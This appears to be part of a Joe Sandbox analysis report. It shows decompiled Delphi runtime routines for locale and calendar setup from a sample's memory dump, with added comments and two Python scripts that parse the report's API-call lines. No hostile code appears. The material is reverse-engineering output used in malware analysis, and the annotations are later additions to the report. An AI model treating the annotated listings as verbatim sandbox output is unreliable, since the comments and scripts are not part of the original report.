                                                                                    				if(_t127 + 0xfffffffd - 3 >= 0) {
                                                                                    					__eflags = _t127 - 0xffffffffffffffff;
                                                                                    					if(_t127 - 0xffffffffffffffff < 0) {
                                                                                    						 *0x4be7dc = 1;
                                                                                    						_push(1);
                                                                                    						E00409C00();
                                                                                    						_t142 = _t142 + 4;
                                                                                    						E00407E00( *0x4be7e0, L"B.C.");
                                                                                    						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
                                                                                    						_t71 =  *0x4be7e0;
                                                                                    						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
                                                                                    						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
                                                                                    						E0041C1C4(1, 1, 1, __eflags, _t161);
                                                                                    						_v20 = E00405790();
                                                                                    						_v16 = 1;
                                                                                    						asm("fild qword [ebp-0x10]");
                                                                                    						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
                                                                                    						asm("wait");
						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4); // CalType 4 = CAL_SERASTRING (era name strings)
                                                                                    						_t78 =  *0x4be7e0;
                                                                                    						__eflags = _t78;
                                                                                    						if(_t78 != 0) {
                                                                                    							_t82 = _t78 - 4;
                                                                                    							__eflags = _t82;
                                                                                    							_t78 =  *_t82;
                                                                                    						}
                                                                                    						_t134 = _t78 - 1;
                                                                                    						__eflags = _t134;
                                                                                    						if(_t134 > 0) {
                                                                                    							_t98 = 1;
                                                                                    							do {
                                                                                    								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
                                                                                    								_t98 = _t98 + 1;
                                                                                    								_t134 = _t134 - 1;
                                                                                    								__eflags = _t134;
                                                                                    							} while (_t134 != 0);
                                                                                    						}
						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3); // CalType 3 = CAL_IYEAROFFSETRANGE (era year offsets)
                                                                                    					}
                                                                                    				} else {
					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4); // CalType 4 = CAL_SERASTRING (era name strings)
                                                                                    					_t85 =  *0x4be7e0;
                                                                                    					if(_t85 != 0) {
                                                                                    						_t85 =  *(_t85 - 4);
                                                                                    					}
                                                                                    					_t136 = _t85 - 1;
                                                                                    					if(_t136 >= 0) {
                                                                                    						_t137 = _t136 + 1;
                                                                                    						_t99 = 0;
                                                                                    						do {
                                                                                    							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
                                                                                    							_t99 = _t99 + 1;
                                                                                    							_t137 = _t137 - 1;
                                                                                    						} while (_t137 != 0);
                                                                                    					}
					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3); // CalType 3 = CAL_IYEAROFFSETRANGE (era year offsets)
                                                                                    				}
                                                                                    				_t94 =  *0x4be7e0;
                                                                                    				if(_t94 != 0) {
                                                                                    					_t94 =  *(_t94 - 4);
                                                                                    				}
                                                                                    				_push(_t94);
                                                                                    				E00409C00();
                                                                                    				_t53 =  *0x4be7e0;
                                                                                    				if(_t53 != 0) {
                                                                                    					_t53 =  *(_t53 - 4);
                                                                                    				}
                                                                                    				_t131 = _t53 - 1;
                                                                                    				if(_t131 >= 0) {
                                                                                    					_t132 = _t131 + 1;
                                                                                    					_t95 = 0;
                                                                                    					do {
                                                                                    						_t127 = _t95 + _t95 * 2;
                                                                                    						_t106 =  *0x416e18; // 0x416e1c
                                                                                    						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
                                                                                    						_t95 = _t95 + 1;
                                                                                    						_t132 = _t132 - 1;
                                                                                    					} while (_t132 != 0);
                                                                                    				}
                                                                                    				_t116 =  *0x41e600; // 0x41e604
                                                                                    				E00409D24(0x4be7e0, _t116);
                                                                                    				_t56 =  *0x4be7e0;
                                                                                    				if(_t56 != 0) {
                                                                                    					_t56 =  *(_t56 - 4);
                                                                                    				}
                                                                                    				 *0x4be7dc = _t56;
                                                                                    				_pop(_t117);
                                                                                    				_pop(_t105);
                                                                                    				 *[fs:eax] = _t117;
                                                                                    				_push(0x41ea4b);
                                                                                    				return E00406868( *0x4be7e4, _t105, _t127);
                                                                                    			}
Instruction addresses for the C-code listing above:
0x0041e7cc, 0x0041e7cc, 0x0041e7cc, 0x0041e7cd, 0x0041e7cf, 0x0041e7d4, 0x0041e7d7, 0x0041e7da, 0x0041e7dd, 0x0041e7e1,
0x0041e7e2, 0x0041e7e7, 0x0041e7ea, 0x0041e7ed, 0x0041e7f2, 0x0041e7f5, 0x0041e7f9, 0x0041e7f9, 0x0041e80b, 0x0041e812,
0x0041e813, 0x0041e818, 0x0041e81b, 0x0041e820, 0x0041e826, 0x0041e837, 0x0041e83c, 0x0041e84f, 0x0041e861, 0x0041e86b,
0x0041e8c8, 0x0041e8cb, 0x0041e8d6, 0x0041e8dc, 0x0041e8ed, 0x0041e8f2, 0x0041e8ff, 0x0041e90b, 0x0041e90e, 0x0041e913,
0x0041e91a, 0x0041e92d, 0x0041e937, 0x0041e93a, 0x0041e93d, 0x0041e945, 0x0041e948, 0x0041e957, 0x0041e95c, 0x0041e961,
0x0041e963, 0x0041e965, 0x0041e965, 0x0041e968, 0x0041e968, 0x0041e96c, 0x0041e96d, 0x0041e96f, 0x0041e971, 0x0041e976,
0x0041e97f, 0x0041e987, 0x0041e988, 0x0041e988, 0x0041e988, 0x0041e976, 0x0041e999, 0x0041e999, 0x0041e86d, 0x0041e87b,
0x0041e880, 0x0041e887, 0x0041e88c, 0x0041e88c, 0x0041e890, 0x0041e893, 0x0041e895, 0x0041e896, 0x0041e898, 0x0041e8a1,
0x0041e8a9, 0x0041e8aa, 0x0041e8aa, 0x0041e898, 0x0041e8bb, 0x0041e8bb, 0x0041e9a3, 0x0041e9a7, 0x0041e9ac, 0x0041e9ac,
0x0041e9ae, 0x0041e9c2, 0x0041e9ca, 0x0041e9d1, 0x0041e9d6, 0x0041e9d6, 0x0041e9da, 0x0041e9dd, 0x0041e9df, 0x0041e9e0,
0x0041e9e2, 0x0041e9e2, 0x0041e9fa, 0x0041ea00, 0x0041ea05, 0x0041ea06, 0x0041ea06, 0x0041e9e2, 0x0041ea0e, 0x0041ea14,
0x0041ea19, 0x0041ea20, 0x0041ea25, 0x0041ea25, 0x0041ea27, 0x0041ea2e, 0x0041ea30, 0x0041ea31, 0x0041ea34, 0x0041ea43

                                                                                    APIs
                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
                                                                                    • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
                                                                                    • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
                                                                                    • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
                                                                                    • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
                                                                                    • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
                                                                                    • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CalendarEnumInfoLocaleThread
                                                                                    • String ID: B.C.$ToA$K$K$K
                                                                                    • API String ID: 683597275-1724967715
                                                                                    • Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                                    • Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
                                                                                    • Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                                                    • Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0040A250() {
                                                                                    				signed int _t2;
                                                                                    				_Unknown_base(*)()* _t8;
                                                                                    
				InitializeCriticalSection(0x4bdc10);
				 *0x4bdc28 = 0x7f;
				_t2 = GetVersion() & 0x000000ff; // low byte of GetVersion() is the OS major version
				 *0x4bdc0c = _t2 - 6 >= 0;       // major >= 6: Windows Vista or later
				if( *0x4bdc0c != 0) {
					// These UI-language APIs only exist from Vista on, so they are
					// resolved at run time instead of being imported statically.
					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
					 *0x4bdc08 = _t8;
					return _t8;
				}
				return _t2;
                                                                                    			}
Instruction addresses for the C-code listing above:
0x0040a255, 0x0040a25a, 0x0040a268, 0x0040a270, 0x0040a27e, 0x0040a295, 0x0040a2af, 0x0040a2c4, 0x0040a2c9, 0x00000000, 0x0040a2c9, 0x0040a2ce

                                                                                    APIs
                                                                                    • InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                                                    • GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                                                    • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                                                    • API String ID: 74573329-1403180336
                                                                                    • Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                                    • Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
                                                                                    • Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                                                    • Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%
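The "APIs" blocks of the two functions above list every call the sandbox saw, but each line prints more stack slots than the API takes (GetThreadLocale has no parameters, yet two values are shown), so the trailing values are whatever happened to be on the stack, not arguments. The script below is an added example, not part of the Joe Sandbox report: it parses those lines, trims each call to its documented parameter count, decodes the CalType argument of EnumCalendarInfoW (3 = CAL_IYEAROFFSETRANGE, 4 = CAL_SERASTRING), and collects the string tokens that appear in the residue, which is where the function names pushed for the following GetProcAddress show up. The sample input is copied from the two blocks above; the arity table and the treatment of extra slots as stack residue are assumptions of this example.

```python
import re
from collections import Counter, defaultdict

# Constructed sample: API reference lines copied from the two "APIs" blocks above.
SAMPLE = """
• GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
• EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
• GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
• EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
• InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
• GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
• GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
"""

# One report line: "• Api.MODULE(arg,arg,...), ref: ADDRESS"
LINE_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_RE = re.compile(r"[0-9A-Fa-f]{8}")

# Documented parameter counts (assumption: limited to the APIs seen on this page).
ARITY = {
    "GetThreadLocale": 0,
    "EnumCalendarInfoW": 4,
    "InitializeCriticalSection": 1,
    "GetVersion": 0,
    "GetModuleHandleW": 1,
    "GetProcAddress": 2,
}

# CalType values of EnumCalendarInfoW used by the code above.
CALTYPE = {0x3: "CAL_IYEAROFFSETRANGE", 0x4: "CAL_SERASTRING"}


def parse_api_lines(text):
    """Return one dict per API line, split into real arguments and stack residue."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = [a for a in m["args"].split(",") if a != ""]
        api = m["api"]
        n = ARITY.get(api)
        args = raw if n is None else raw[:n]  # unknown arity: keep everything
        calls.append({
            "api": api,
            "module": m["module"],
            "args": args,
            "residue": raw[len(args):],  # slots beyond the documented parameters
            "ref": int(m["ref"], 16),
        })
    return calls


def decode_calendar_calls(calls):
    """(call site, CalType name) for every EnumCalendarInfoW call."""
    out = []
    for c in calls:
        if c["api"] == "EnumCalendarInfoW" and len(c["args"]) == 4:
            caltype = int(c["args"][3], 16)
            out.append((c["ref"], CALTYPE.get(caltype, hex(caltype))))
    return out


def summarize(calls):
    """Per module, how many times each API was called."""
    per_module = defaultdict(Counter)
    for c in calls:
        per_module[c["module"]][c["api"]] += 1
    return per_module


def strings_seen(calls):
    """Non-hex tokens from arguments and residue: DLL and export names pushed on the stack."""
    found = set()
    for c in calls:
        for tok in c["args"] + c["residue"]:
            if not HEX_RE.fullmatch(tok):
                found.add(tok)
    return found


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for ref, name in decode_calendar_calls(parsed):
        print(f"{ref:08X}: EnumCalendarInfoW CalType {name}")
    for module, counts in summarize(parsed).items():
        print(module, dict(counts))
    print("strings on stack:", sorted(strings_seen(parsed)))
```

Trimming to the documented arity is what keeps an analyst from reading `GetThreadLocale(00000000,00000004)` as a call with two arguments; the residue still has value, as the `GetThreadPreferredUILanguages` string left behind after `GetModuleHandleW` shows.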

                                                                                    C-Code - Quality: 71%
                                                                                    			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                                    				char _v8;
                                                                                    				char _v12;
                                                                                    				char _v16;
                                                                                    				char _v20;
                                                                                    				char _v24;
                                                                                    				char _v28;
                                                                                    				char _v32;
                                                                                    				char _v36;
                                                                                    				char _v40;
                                                                                    				char _v44;
                                                                                    				char _v48;
                                                                                    				char _v52;
                                                                                    				char _v56;
                                                                                    				char _v60;
                                                                                    				int _t55;
                                                                                    				void* _t121;
                                                                                    				void* _t128;
                                                                                    				void* _t151;
                                                                                    				void* _t152;
                                                                                    				intOrPtr _t172;
                                                                                    				intOrPtr _t204;
                                                                                    				signed short _t212;
                                                                                    				int _t214;
                                                                                    				intOrPtr _t216;
                                                                                    				intOrPtr _t217;
                                                                                    				void* _t224;
                                                                                    
                                                                                    				_t224 = __fp0;
                                                                                    				_t211 = __edi;
                                                                                    				_t216 = _t217;
                                                                                    				_t152 = 7;
                                                                                    				do {
                                                                                    					_push(0);
                                                                                    					_push(0);
                                                                                    					_t152 = _t152 - 1;
                                                                                    				} while (_t152 != 0);
                                                                                    				_push(__edi);
                                                                                    				_t151 = __edx;
                                                                                    				_t214 = __eax;
                                                                                    				_push(_t216);
                                                                                    				_push(0x41e391);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t217;
                                                                                    				_t55 = IsValidLocale(__eax, 1);
                                                                                    				_t219 = _t55;
                                                                                    				if(_t55 == 0) {
                                                                                    					_t214 = GetThreadLocale();
                                                                                    				}
                                                                                    				_t172 =  *0x416f50; // 0x416f54
                                                                                    				E00409D24(_t151 + 0xbc, _t172);
                                                                                    				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
                                                                                    				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
                                                                                    				E0041E55C(_t214, _t151, _t151, _t211, _t214);
                                                                                    				E0041E034(_t214, 0, 0x14,  &_v20); // 0x14 = LOCALE_SCURRENCY (CurrencyString)
                                                                                    				E00407E00(_t151, _v20);
                                                                                    				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24); // 0x1b = LOCALE_ICURRENCY (CurrencyFormat)
                                                                                    				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                                                    				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28); // 0x1c = LOCALE_INEGCURR (NegCurrFormat)
                                                                                    				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                                                    				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf); // 0xf = LOCALE_STHOUSAND, default ','
                                                                                    				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe); // 0xe = LOCALE_SDECIMAL, default '.'
                                                                                    				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32); // 0x19 = LOCALE_ICURRDIGITS (CurrencyDecimals)
                                                                                    				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                                                    				_t212 = E0041E080(_t214, 0x2f, 0x1d); // 0x1d = LOCALE_SDATE (DateSeparator), default '/'
                                                                                    				 *(_t151 + 6) = _t212;
                                                                                    				_push(_t212);
                                                                                    				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36); // 0x1f = LOCALE_SSHORTDATE
                                                                                    				E00407E00(_t151 + 0xc, _v36);
                                                                                    				_push( *(_t151 + 6) & 0x0000ffff);
                                                                                    				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40); // 0x20 = LOCALE_SLONGDATE
                                                                                    				E00407E00(_t151 + 0x10, _v40);
                                                                                    				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e); // 0x1e = LOCALE_STIME (TimeSeparator), default ':'
                                                                                    				E0041E034(_t214, 0x41e400, 0x28,  &_v44); // 0x28 = LOCALE_S1159 (TimeAMString)
                                                                                    				E00407E00(_t151 + 0x14, _v44);
                                                                                    				E0041E034(_t214, 0x41e414, 0x29,  &_v48); // 0x29 = LOCALE_S2359 (TimePMString)
                                                                                    				E00407E00(_t151 + 0x18, _v48);
                                                                                    				E00407A20( &_v12);
                                                                                    				E00407A20( &_v16);
                                                                                    				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52); // 0x25 = LOCALE_ITLZERO: leading zero selects the hour format string
                                                                                    				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
                                                                                    				_t220 = _t121;
                                                                                    				if(_t121 != 0) {
                                                                                    					E00407E48( &_v8, 0x41e438);
                                                                                    				} else {
                                                                                    					E00407E48( &_v8, 0x41e428);
                                                                                    				}
                                                                                    				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56); // 0x23 = LOCALE_ITIME (0 = 12-hour clock)
                                                                                    				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
                                                                                    				_t221 = _t128;
                                                                                    				if(_t128 == 0) {
                                                                                    					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60); // 0x1005 = LOCALE_ITIMEMARKPOSN: AM/PM marker before or after
                                                                                    					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
                                                                                    						E00407E48( &_v12, L"AMPM ");
                                                                                    					} else {
                                                                                    						E00407E48( &_v16, L" AMPM");
                                                                                    					}
                                                                                    				}
                                                                                    				_push(_v12);
                                                                                    				_push(_v8);
                                                                                    				_push(":mm");
                                                                                    				_push(_v16);
                                                                                    				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
                                                                                    				_push(_v12);
                                                                                    				_push(_v8);
                                                                                    				_push(L":mm:ss");
                                                                                    				_push(_v16);
                                                                                    				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
                                                                                    				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc); // 0xc = LOCALE_SLIST (ListSeparator), default ','
                                                                                    				 *((short*)(_t151 + 0xc4)) = 0x32; // TwoDigitYearCenturyWindow := 50
                                                                                    				_pop(_t204);
                                                                                    				 *[fs:eax] = _t204;
                                                                                    				_push(0x41e398);
                                                                                    				return E00407A80( &_v60, 0xe);
                                                                                    			}

                                                                                    Instruction addresses, one per statement of the listing above, in order: 0x0041e0ac, 0x0041e0ac, 0x0041e0ad, 0x0041e0af, 0x0041e0b4, 0x0041e0b4, 0x0041e0b6, 0x0041e0b8, 0x0041e0b8, 0x0041e0bd, 0x0041e0be, 0x0041e0c0, 0x0041e0c4, 0x0041e0c5, 0x0041e0ca, 0x0041e0cd, 0x0041e0d3, 0x0041e0d8, 0x0041e0da, 0x0041e0e1, 0x0041e0e1, 0x0041e0e9, 0x0041e0ef, 0x0041e0f8, 0x0041e101, 0x0041e10a, 0x0041e11c, 0x0041e126, 0x0041e13b, 0x0041e14a, 0x0041e15d, 0x0041e16c, 0x0041e182, 0x0041e199, 0x0041e1b0, 0x0041e1bf, 0x0041e1d2, 0x0041e1d4, 0x0041e1d8, 0x0041e1e9, 0x0041e1f4, 0x0041e1fd, 0x0041e20e, 0x0041e219, 0x0041e22e, 0x0041e242, 0x0041e24d, 0x0041e262, 0x0041e26d, 0x0041e275, 0x0041e27d, 0x0041e292, 0x0041e29c, 0x0041e2a1, 0x0041e2a3, 0x0041e2bc, 0x0041e2a5, 0x0041e2ad, 0x0041e2ad, 0x0041e2d1, 0x0041e2db, 0x0041e2e0, 0x0041e2e2, 0x0041e2f4, 0x0041e305, 0x0041e31e, 0x0041e307, 0x0041e30f, 0x0041e30f, 0x0041e305, 0x0041e323, 0x0041e326, 0x0041e329, 0x0041e32e, 0x0041e339, 0x0041e33e, 0x0041e341, 0x0041e344, 0x0041e349, 0x0041e354, 0x0041e369, 0x0041e36d, 0x0041e378, 0x0041e37b, 0x0041e37e, 0x0041e390

                                                                                    APIs
                                                                                    • IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
                                                                                    • GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
                                                                                      • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                                                      • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
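                                                                                    The API entries above have a fixed text shape: an optional "Part of subcall function XXXXXXXX:" prefix, then Api.MODULE(args) and the call-site ref. The Python below is added here as an example; it is not part of the Joe Sandbox report or of the sample. It parses such lines into records, groups call sites per API and names the LCTYPE argument of each GetLocaleInfoW call (values from winnls.h). SAMPLE is the four lines of this listing; the function and class names are the example's own.

```python
"""Parse the "APIs" entries of a Joe Sandbox function listing into records.

Added example, not part of the report. SAMPLE below is copied from the
E0041E0AC listing on this page; helper names are the example's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# LCTYPE values (winnls.h) for the GetLocaleInfoW calls made by this function.
LCTYPES = {
    0x0C: "LOCALE_SLIST", 0x0E: "LOCALE_SDECIMAL", 0x0F: "LOCALE_STHOUSAND",
    0x14: "LOCALE_SCURRENCY", 0x19: "LOCALE_ICURRDIGITS", 0x1B: "LOCALE_ICURRENCY",
    0x1C: "LOCALE_INEGCURR", 0x1D: "LOCALE_SDATE", 0x1E: "LOCALE_STIME",
    0x1F: "LOCALE_SSHORTDATE", 0x20: "LOCALE_SLONGDATE", 0x23: "LOCALE_ITIME",
    0x25: "LOCALE_ITLZERO", 0x28: "LOCALE_S1159", 0x29: "LOCALE_S2359",
    0x1005: "LOCALE_ITIMEMARKPOSN",
}

# "• [Part of subcall function XXXXXXXX: ]Api.MODULE(arg,arg,...), ref: XXXXXXXX"
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function\s+(?P<subfn>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiRef:
    api: str
    module: str
    args: List[Optional[int]]   # hex value, or None where the report shows '?'
    ref: int                    # call-site address inside the function
    subcall_of: Optional[int]   # set when the call happens inside a callee

    def lctype(self) -> Optional[str]:
        """Name the LCType argument of a GetLocaleInfoW(Locale, LCType, ...) call."""
        if self.api != "GetLocaleInfoW" or len(self.args) < 2 or self.args[1] is None:
            return None
        return LCTYPES.get(self.args[1], "LCTYPE_0x%X" % self.args[1])


def _parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok == "?" else int(tok, 16)


def parse_api_lines(text: str) -> List[ApiRef]:
    """Return one ApiRef per well-formed API line, in listing order."""
    refs = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as "APIs" / "Strings" and any other text
        args = [_parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        refs.append(ApiRef(m["api"], m["module"], args, int(m["ref"], 16),
                           int(m["subfn"], 16) if m["subfn"] else None))
    return refs


def call_sites(refs: List[ApiRef]) -> dict:
    """Map API name -> sorted call-site addresses (direct and subcall alike)."""
    out = {}
    for r in refs:
        out.setdefault(r.api, []).append(r.ref)
    return {k: sorted(v) for k, v in out.items()}


def decoded_lctypes(refs: List[ApiRef]) -> dict:
    """Map call site -> LOCALE_* name for every GetLocaleInfoW whose LCType is visible."""
    return {r.ref: r.lctype() for r in refs if r.lctype()}


# Sample input: the four API lines of the E0041E0AC listing on this page.
SAMPLE = """
APIs
• IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
• GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
  • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
  • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
Strings
"""

if __name__ == "__main__":
    for r in parse_api_lines(SAMPLE):
        inside = ("%08X" % r.subcall_of) if r.subcall_of is not None else "-"
        print("%08X %-16s %-8s subcall_of=%s lctype=%s" % (r.ref, r.api, r.module, inside, r.lctype()))
    print(call_sites(parse_api_lines(SAMPLE)))
```

                                                                                    Arguments shown as "?" in the report are unresolved snapshot values, so the decoder only names an LCType when the second argument is concrete; on this listing that is the 0x0F (LOCALE_STHOUSAND) call at 0041E093, while the 0041E052 call inside E0041E034 receives its LCType from the caller and stays undecoded.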
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Locale$Info$ThreadValid
                                                                                    • String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
